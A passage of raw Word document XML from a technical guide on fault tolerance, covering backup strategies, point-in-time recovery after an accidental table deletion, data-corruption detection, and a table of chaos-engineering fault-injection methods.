        <w:t xml:space="preserve">  - Circuit breaker on pool (stop trying if pool is consistently failing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA2E2F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="6095CF57">
          <v:rect id="_x0000_i6352" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA7A3F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Data Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C08D11" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Backup Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F09846" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E79C4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The 3-2-1 Rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6220DB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3 copies of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E93446F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  2 different storage media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B505C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1 offsite (different physical location)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AA9621" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="6C4E41BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Backup types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113CA9A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Full: Complete copy (expensive, simple restore).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F455C49" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Incremental: Only changes since last backup (cheap, complex restore).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F23696" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Continuous: WAL/binlog streaming (near-zero RPO, complex infrastructure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2124D8B5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1D9A64C9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Backup schedule example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47193302" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Continuous: WAL archived to S3 (every segment, ~16 MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC6B236" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Daily: Full base backup (pg_basebackup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF9D54" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Weekly: Full backup verified with restore test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353385F2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Monthly: Copy to another region (disaster recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A65402" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Point-in-Time Recovery (PITR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF181F4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B135472" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Scenario: Engineer accidentally runs DELETE FROM users (no WHERE clause).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B54FA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  All rows deleted. Replicated to all replicas immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05180A89" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Replicas are useless — they all have the deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658EC3C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1C6B71B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Recovery with PITR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F58078" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1. Last base backup: taken at 00:00 today.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E6E62" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  2. WAL segments: archived continuously since 00:00.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED89EE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3. Accident happened at 14:30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1519D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C34F270" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26459D03" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Restore base backup (state at 00:00).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A54C43" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Replay WAL up to 14:29:59.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6B8DD0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Database restored to 1 second before the accident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682C5ED8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Data loss: 1 second of legitimate writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093F6F18" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Data Integrity (Detecting Corruption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195B166" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C39369" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Silent data corruption: data changes without the system knowing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FAF890" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Disk bit rot (bits flip over time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E88D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - RAM errors (cosmic rays, hardware defects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7874D32E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Software bugs (incorrect writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6908F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Network corruption (rare but possible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267499BD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="623AAEB1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004C9DA3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Checksums on data at rest (ZFS, Btrfs, PostgreSQL page checksums).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164827D2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Checksums on data in transit (TCP checksum, TLS MAC, gRPC CRC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692C6034" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - ECC RAM (detects and corrects single-bit errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673ACF2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Scrubbing (background process reads all data, verifies checksums).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBEAE34" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Application-level integrity checks (hash of critical data verified periodically).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742E0F7A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="2614AEA3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>PostgreSQL data checksums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027C6BAD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  initdb --data-checksums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B71C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Every 8 KB page has a checksum. On read: verify checksum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55881C3C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Mismatch → ERROR (don't serve corrupted data — fail loudly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B004D5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="6E40298C">
          <v:rect id="_x0000_i6353" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B653D1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Testing Fault Tolerance — Chaos Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA5D1B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 The Philosophy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992A908" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B51AD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>"The best way to ensure your system handles failures is to CAUSE failures intentionally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72293568" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve"> in production, in a controlled manner, and verify the system behaves correctly."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F2D5A3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4BFA959F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>If you've never tested the failure path, you don't know if it works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674AD292" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Most outages are caused by failure paths that were never exercised:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D14C3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Failover script had a bug (never tested in production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259261FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Health check didn't detect the actual failure mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC62F5A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Circuit breaker was misconfigured (threshold too high).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1386FA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Alert didn't fire (rule was wrong).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E2B9D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Chaos Engineering Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134C1D8D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault injection types:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2108"/>
        <w:gridCol w:w="3588"/>
        <w:gridCol w:w="3654"/>
      </w:tblGrid>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="256CCAF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1652E8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Fault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778052" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tool/Method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82B52A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What It Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="46FFAC8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B38D92" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Kill random pod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4AEF15" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Chaos Monkey, kubectl delete pod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C2D8B0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Service resilience to instance loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="6C009F5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8ABA04" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Kill random node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0F18C6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Chaos Monkey, AWS instance termination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363E4A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Multi-AZ failover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="02373EB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ED62DB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Network delay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F669D1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>tc netem, Toxiproxy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462CF3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Timeout handling, circuit breakers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="127E357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6CF308" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Network partition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B42E83" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>iptables, Chaos Mesh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690F57" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Split-brain handling, consensus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="610E956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D65DFE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Disk full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E0967D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>fallocate, stress tools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FA229C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Graceful degradation when storage exhausted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="24665B1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86B5B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>CPU stress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F5D56B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>stress-ng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093C97" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Behavior under resource contention</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="686A786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C0C92A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Clock skew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F1FAE4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>libfaketime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32E43B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Time-dependent logic, certificate validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="2299936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993658" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>DNS failure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C6B9A4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Block DNS traffic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CCA318" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>DNS caching, fallback behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="28D83CA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B7CAE7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:lastRenderedPageBreak/>
              <w:t>Dependency failure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EFE885" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Toxiproxy, service mesh fault injection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B7FFAC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Circuit breakers, fallbacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
